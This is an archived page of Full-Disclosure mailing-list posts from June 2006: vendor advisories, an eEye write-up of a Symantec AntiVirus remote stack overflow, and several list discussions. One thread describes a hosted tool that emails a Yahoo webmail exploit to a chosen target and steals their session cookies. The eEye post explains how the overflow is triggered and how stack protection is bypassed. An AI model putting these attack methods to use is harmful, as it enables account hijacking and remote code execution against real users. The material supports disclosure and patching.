http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: GDM: Privilege escalation
  Date: June 12, 2006
  Bugs: #135027
ID: 200606-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An authentication error in GDM could allow users to gain elevated
privileges.

Background
==

GDM is the GNOME display manager.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  gnome-base/gdm   2.8.0.8  = 2.8.0.8

Description
===

GDM allows a normal user to access the configuration manager.

Impact
==

When the face browser in GDM is enabled, a normal user can use the
configure login manager with his/her own password instead of the root
password, and thus gain additional privileges.

Workaround
==

There is no known workaround at this time.

Resolution
==

All GDM users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =gnome-base/gdm-2.8.0.8

References
==

  [ 1 ] Gnome Bugzilla entry
http://bugzilla.gnome.org/show_bug.cgi?id=343476
  [ 2 ] CVE-2006-2452
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2006-2452

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpN7M6VuNkON.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PassMark?

2006-06-12 Thread Gary E. Miller
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yo All!

I thought I'd actually risk a real security question here.

Any one seen the PassMark (www.passmarksecurity.com) security system
in action?

RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.1 (GNU/Linux)

iD8DBQFEjddm8KZibdeR3qURAmzFAKDZTMYDEQvOVeUDX4XSwRnj2SNeOgCePmIW
927G9Hax89s4b0M/uQVTOe4=
=w52u
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Jacob Wu
I'm getting port 21 connection attempts every 5 minutes from about half a
dozen of my network users.  These attempts are repeating regularly with one
computer sending out 1500+ attempts a day.  I have not seen this before and
I'm wondering if anyone else here has seen a client behave this way before?

My initial thoughts were: hacker, virus/trojan/spyware or badly configured
program.  I ruled hacker out right away when talking to the clients and
realizing they didn't even understand the concept of ports.  After receiving
the machines from the clients and doing vigorous virus/trojan/spyware scans
I have found nothing known on them.

Anyone got anything?  Is this something new or just new to me?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Jun 12, 2006 at 04:30:40PM -0500, Jacob Wu wrote:
 I'm getting port 21 connection attempts every 5 minutes from about half a
 dozen of my network users.  These attempts are repeating regularly with one
 computer sending out 1500+ attempts a day.  I have not seen this before and
 I'm wondering if anyone else here has seen a client behave this way before?

What is the target address ?

- -- 
Rodrigo Barbosa
Quid quid Latine dictum sit, altum viditur
Be excellent to each other ... - Bill  Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEjeCApdyWzQ5b5ckRAoPzAJ4loHH0DksEflmRcbF2qI6lEfOYHgCePO7T
Zmq7U+R7WVyVPalkhdlF7Vk=
=FUjp
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] repeated port 21 attempts

2006-06-12 Thread Matt Venzke

Try websnarf:  http://www.unixwiz.net/tools/websnarf-1.04

Set the port to 21  log some of the data they're sending.  You can
have it log the session to a file, too, I think.  Note that the one
line it grabs may not amount to much of anything, but it might give
you some idea what the machines are trying to do.

- Matt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow

2006-06-12 Thread eEye Advisories
Symantec Remote Management Stack Buffer Overflow

Release Date:
June 12, 2006

Date Reported:
May 24, 2006

Severity:
High (Remote Code Execution)

Systems Affected:
Symantec AntiVirus 10.0.x for Windows (all versions)
Symantec AntiVirus 10.1.x for Windows (all versions)
Symantec Client Security 3.0.x for Windows (all versions)
Symantec Client Security 3.1.x for Windows (all versions)

Systems Not Affected:
Symantec AntiVirus 10.x.x for Macintosh
Symantec AntiVirus 10.x.x for Linux
Symantec AntiVirus 10.x.x for Wireless

Overview:
eEye Digital Security has discovered a vulnerability in the remote
management interface for Symantec AntiVirus 10.x and Symantec Client
Security 3.x, which could be exploited by an anonymous attacker in order
to execute arbitrary code with SYSTEM privileges on an affected system.
The management interface is typically enabled in enterprise settings and
listens on TCP port 2967 by default, for both server and client systems.

Although remote management traffic is typically SSL-encrypted, managed
systems will accept and process clear-text requests of the vulnerable
type.

Technical Details:
The remote management protocol communicated by the affected products is
a proprietary message-based protocol with two levels of encapsulation.
The outer layer comprises a message header indicating one of three
message types: 10, which designates a request to Rtvscan.exe, or 20 or
30, which mediate SSL negotiation.  If SSL is established for a TCP
connection, subsequent traffic is encrypted although the plaintext is
still in the proprietary format.

The data of type-10 messages contains its own header and body which are
processed by Rtvscan.exe.  This header features a command field which
specifies the operation to perform and dictates the format of the body
data.

The COM_FORWARD_LOG (0x24) command handler contains an improper use of
strncat that allows a 0x180-byte stack buffer to be overflowed with
arbitrary data.  If the first string in the COM_FORWARD_LOG request body
contains a backslash, then one of the following two strncat calls will
be performed:

 * If the string contains a comma but no double-quote:

strncat(dest, src, 0x17A - strlen(src));

 * Otherwise:

strncat(dest, src, 0x17C - strlen(src));

If the length of the source string exceeds 0x17A or 0x17C characters
respectively, the arithmetic will underflow and result in a very large
copy size (since the copy size argument is of type size_t, which is
unsigned).  This causes the entire source string to be appended to the
buffer, allowing the stack to be overwritten with up to 64KB of data in
which only null characters are prohibited.

Rtvscan.exe was compiled with the Visual Studio /GS security option
which institutes stack canary checks, but this security measure can be
bypassed by causing a very large overwrite and taking control of an
exception handler registration.

As a basic workaround against automated exploitation, the management
interface TCP port may be changed via the
HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\
AgentIPPort registry value in order to accomplish a very slight amount
of obfuscation.  Remote management should continue to function even if
the new port numbers are not homogeneous across an enterprise.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from
this vulnerability.

Vendor Status:
Symantec has released patches for the affected products.  For more
information, please consult Symantec security advisory SYM06-010:
http://www.symantec.com/avcenter/security/Content/2006.05.25.html

Note that the installation of one or more previous patches may be
required before the SYM06-010 patch can be applied.

This issue has been assigned CVE-2006-2630.

Credit:
Derek Soeder

Related Links:
Retina Network Security Scanner - Free Trial
(http://www.eeye.com/html/products/retina/index.html)
Blink Endpoint Vulnerability Prevention - Free Trial
(http://www.eeye.com/html/products/blink/index.html)

Greetings:
Symantec engineers, for very quickly producing a solid patch.  Family
and friends.  Anti-greets to copperhead snakes.

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this 

RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread Sean Crawford


-Original Message- On Behalf Of n3td3v
Sent: Tuesday, June 13, 2006 4:05 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vunerability in yahoo webmail.

Yahoo is under the control of hackers.

Good, Yahoo are a pathetic service anyway so it's no big deal, hey.
$0.02
Sean.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Thanks for the feedback! GreenBorder License inside - with new options - valid to end of year

2006-06-12 Thread Bill Stout
Hello List,

Thank you all for the feedback I've received so far.  Some of the
feedback I'm receiving is that it might also serve as a malware analysis
tool if we improve logging messages.  

In thanks to the list, and in the hope more security experts will stress
test the software, here's an extended period license:

D34OOW2267INS22JFDSOICKCCOE22EDX 

This is valid until the end of the year.  This also adds a 'safe file'
option - right-click on any executable or questionable file to open it
in virtual space.  Note: Many but not all programs will run in virtual
space, support for Firefox, IM, and other networking programs is not
official and have not been fully QA'd.  

Also, we've added more security by adding a firewall between virtual
space and local network ports.  The binary was updated late on Friday
(6/9), and is available from here:

http://www.greenborder.com/earlyaccess/ 

Bill Stout


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Winword crashes

2006-06-12 Thread putosoft softputo

I have no time to check it so there are details about the crash:

Open in a browser the following location:
http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491

Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will 
always crash with a failure in MS09!GetSeletedLbx.


May be something with the table's cells?

_
Moda para esta temporada. Ponte al día de todas las tendencias. 
http://www.msn.es/Mujer/moda/default.asp


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ZoneEdit.com Forcing Pop-Unders on WebForward-Configured Domains

2006-06-12 Thread Jason Coombs

Problem:

DNS service ZoneEdit.com now owned by MyDomains.com has started forcing 
JavaScript pop-Unders onto users' browsers when the domain owner uses 
the ZoneEdit WebForward feature.



References:

www.zoneedit.com

www.mydomains.com/support.php

www.casalemedia.com/contact.html


Details:

Casale Media, Inc. is the Pop-Under Spammer responsible for paying My 
Domains cash money to distribute this crap to users. Example script 
shown below, embedded within the WebForward Cloaking frame.


script language=JavaScript src=http://as.casalemedia.com/sd?s=65701f=1;


Possible Resolutions:

Stop using ZoneEdit for backup/failover or primary DNS service.

Remove the economic incentive to lie, cheat and steal.

Prosecute the offenders and send them to prison.

Send/Fax your objections to ZoneEdit/MyDomains

Correspondence or payment by check may be sent to our office at:
ZoneEdit, Inc.
111 Broadway, 11th Floor
New York, NY 10006
Fax:+1 (847) 461-1893

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread php0t
Title: Message



Oh, I've CC'd [EMAIL PROTECTED], but if someone else would 
give them a proper write-up, and encourage
 
them to close the hole, that'd be wonderful.

Since 
yahoo isn't known for fixing bugs fast unless it's serious (and even then), 
here's something i wrote up today.
The 
exploit is turned into a script-kiddish interface. Here's how it 
works:
1) you 
enter your email and the target (@yahoo.com) email
2) an 
email with the exploit is sent to the target
3) 
when the targetopens the mail for reading,cookies get stolen and you 
get a notification on the address specified
4) 
further instructions on how to log in are on the site.

Testedon IExplore and Opera, works with both.

http://zmailhost.ath.cx/

(I'm 
taking it down when yahoo fixes it or people abuse it too 
much)

[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread php0t
Title: Message



For 
the record: 30 minutes after I posted this, onLoad got changed to onfiltered - 
problem fixed by yahoo. :)



  
  -Original Message-From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED] On Behalf Of 
  php0tSent: Tuesday, June 13, 2006 2:28 AMTo: 
  full-disclosure@lists.grok.org.ukSubject: RE: [Full-disclosure] 
  Vunerability in yahoo webmail.
  Oh, I've CC'd [EMAIL PROTECTED], but if someone else would 
  give them a proper write-up, and encourage
   
  them to close the hole, that'd be wonderful.
  
  Since yahoo isn't known for fixing bugs fast unless it's serious (and 
  even then), here's something i wrote up today.
  The 
  exploit is turned into a script-kiddish interface. Here's how it 
  works:
  1) 
  you enter your email and the target (@yahoo.com) email
  2) 
  an email with the exploit is sent to the target
  3) 
  when the targetopens the mail for reading,cookies get stolen and 
  you get a notification on the address specified
  4) 
  further instructions on how to log in are on the site.
  
  Testedon IExplore and Opera, works with both.
  
  http://zmailhost.ath.cx/
  
  (I'm 
  taking it down when yahoo fixes it or people abuse it too 
  much)
  
  [EMAIL PROTECTED]
  
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread Cardoso

Congratulations to the hackers running Yahoo!!



On Tue, 13 Jun 2006 03:07:56 +0200
php0t [EMAIL PROTECTED] wrote:

p Message
p For the record: 30 minutes after I posted this, onLoad got changed to 
onfiltered - problem fixed by yahoo. :)
p 
p 
p  
p  -Original Message-
p  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of php0t
p  Sent: Tuesday, June 13, 2006 2:28 AM
p  To: full-disclosure@lists.grok.org.uk
p  Subject: RE: [Full-disclosure] Vunerability in yahoo webmail.
p  
p  
p   Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them 
a proper write-up, and encourage  
p   them to close the hole, that'd be wonderful. 
p  
p  Since yahoo isn't known for fixing bugs fast unless it's serious (and 
even then), here's something i wrote up today.
p  The exploit is turned into a script-kiddish interface. Here's how it 
works:
p  1) you enter your email and the target (@yahoo.com) email
p  2) an email with the exploit is sent to the target
p  3) when the target opens the mail for reading, cookies get stolen and 
you get a notification on the address specified
p  4) further instructions on how to log in are on the site.
p  
p  Tested on IExplore and Opera, works with both.
p  
p  http://zmailhost.ath.cx/
p  
p  (I'm taking it down when yahoo fixes it or people abuse it too much)
p  
p  [EMAIL PROTECTED]
p  
p  

Allgemeinen Anschulterlaubnis
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Winword crashes

2006-06-12 Thread hypermodest
Hello putosoft,

Tuesday, June 13, 2006, 12:56:56 AM, you wrote:

 I have no time to check it so there are details about the crash:

 Open in a browser the following location:
 http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491

 Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will 
 always crash with a failure in MS09!GetSeletedLbx.

Word 2003 (11.6359.6360) SP1 is not crashing.


-- 
Best regards,
 hypermodestmailto:[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] PassMark?

2006-06-12 Thread Randal T. Rioux
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Gary E. Miller wrote:
 Yo All!
 
 I thought I'd actually risk a real security question here.
 
 Any one seen the PassMark (www.passmarksecurity.com) security system
 in action?
 

Yes.

Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent
financial client corp. of mine.

I'm not impressed with it.

Randy

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0
o6/Swjo9ZIyc4Hsb7223koo=
=s8LO
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] PassMark?

2006-06-12 Thread Q-Ball
I would agree as well, having recently reviewed them with others in the same field. Apart from relying on users to only enter their password if they saw an image, the solution heavily relied on cookie usage. This works fine for most people but a lot of corporate environments have persistant cookie polices so this ends up being an annoyance and ineffective for this segment of users. It also makes it susceptible to keystroke loggers due to the ease of which the challange can be generated. I'd also have trouble justifying this as anything other than a 2 x 1-factor solution and as such it may not meet FFIEC guidlines.
The bigger issue, as with any other web based authentication solutions, is what does this protect you against and the answer these days is not a lot.Q-BallOn 6/13/06, 
Randal T. Rioux [EMAIL PROTECTED] wrote:
-BEGIN PGP SIGNED MESSAGE-Hash: RIPEMD160Gary E. Miller wrote: Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark (
www.passmarksecurity.com) security system in action?Yes.Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recentfinancial client corp. of mine.
I'm not impressed with it.Randy-BEGIN PGP SIGNATURE-Version: GnuPG v1.4.2.2 (GNU/Linux)Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0o6/Swjo9ZIyc4Hsb7223koo==s8LO-END PGP SIGNATURE-___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: FW: [Full-disclosure] PassMark?

2006-06-12 Thread Josh L. Perrymon
I am not impressed with the PassMark solution. It would be trivial to setup a script of rotating images that are used by the passmark widget.. then feed them back to the user and have a script post stating the image that was on the screen when the user clicked submit..
Also feeding in any 2nd level password.. AND the next code that may change in 60 seconds.. It would just require the attacker to perform some parts of the attack manually rather than scripted..I'm mean-- the more hoops you have to jump through will make it harder to attack or replicate from a phishing view.. but also making it much more cumbersome on users.
JPPacketFocusI have only spent a few minutes looking at the passmark demo.. so disregard if I'm way off :)
-Original Message-From: Q-Ball 
[mailto:[EMAIL PROTECTED]] Sent: Tuesday, 13 June 2006 2:28 
PMTo: Randal T. RiouxCc: 
full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] 
PassMark?I would agree as well, having recently reviewed 
them with others in the same field. Apart from relying on users to only enter 
their password if they saw an image, the solution heavily relied on cookie 
usage. This works fine for most people but a lot of corporate environments have 
persistant cookie polices so this ends up being an annoyance and ineffective for 
this segment of users. It also makes it susceptible to keystroke loggers due to 
the ease of which the challange can be generated. I'd also have trouble 
justifying this as anything other than a 2 x 1-factor solution and as such it 
may not meet FFIEC guidlines. The bigger issue, as with any other web based 
authentication solutions, is what does this protect you against and the answer 
these days is not a lot.Q-Ball
On 6/13/06, Randal T. 
Rioux [EMAIL PROTECTED] wrote:
-BEGIN 
  PGP SIGNED MESSAGE-Hash: RIPEMD160Gary E. Miller 
  wrote: Yo All! I thought I'd actually risk a real 
  security question here. Any one seen the PassMark ( www.passmarksecurity.com
) security 
  system in action?Yes.Bank of 
  Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recentfinancial 
  client corp. of mine. I'm not impressed with 
  it.Randy-BEGIN PGP SIGNATURE-Version: GnuPG 
  v1.4.2.2 (GNU/Linux)Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org 
  iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0o6/Swjo9ZIyc4Hsb7223koo==s8LO-END 
  PGP 
  SIGNATURE-___Full-Disclosure 
  - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted 
  and sponsored by Secunia - http://secunia.com/ 
  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSL VPNs and security

2006-06-12 Thread Q-Ball
SSL VPNs have their legitimate place as does IPSec. Personally, I'd rather that travelling exec's who need to log on from a public Internet terminal, dont have full IP connectivity into the network, but maybe that's just me.
Q-BallOn 6/10/06, Tim [EMAIL PROTECTED] wrote:
 That depends on whether the solution tries to solve single-sign-on problems as well.If the vendor is trying to handle SSO in such an environment, then they are probably using domain cookies.The
 problems are exactly the same as the ones Michal listed, plus some additional ones specific to domain cookies.Right, that does make it difficult.There's probably work arounds, butthey may be browser-specific.Wildcard cookies, cookies set to other
origins, or somehow setting document.domain back to the base domainafter the initial page load might help, but some would probably presentthe same problem.The web was never designed for complex application development.At
least, web standards aren't.Use a real VPN.cheers,tim___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1096-1] New webcalendar packages fix arbitrary code execution

2006-06-12 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1096-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
June 13th, 2006 http://www.debian.org/security/faq
- --

Package: webcalendar
Vulnerability  : uninitialised variable
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-2762

A vulnerability has been discovered in webcalendar, a PHP-based
multi-user calendar, that allows a remote attacker to execute
arbitrary PHP code when register_globals is turned on.

The old stable distribution (woody) does not contain a webcalendar package.

For the stable distribution (sarge) this problem has been fixed in
version 0.9.45-4sarge5.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.4-1

We recommend that you upgrade your webcalendar package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.dsc
  Size/MD5 checksum:  608 216c1f9f764169fa877f1717f37dd73a

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.diff.gz
  Size/MD5 checksum:12569 3a996902a10791fe764548728885d812

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
  Size/MD5 checksum:   612360 a6a66dc54cd293429b604fe6da7633a6

  Architecture independent components:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5_all.deb
  Size/MD5 checksum:   629442 f918fe96d26d5cbfa99efe2b2e938d2f


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEjk90W5ql+IAeqTIRArYKAKCJic+8h2YdllXcH8xtJPmj2xMyGwCglQXg
owYhn8S6C9P4sO5vbiIh2/w=
=Y3y5
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/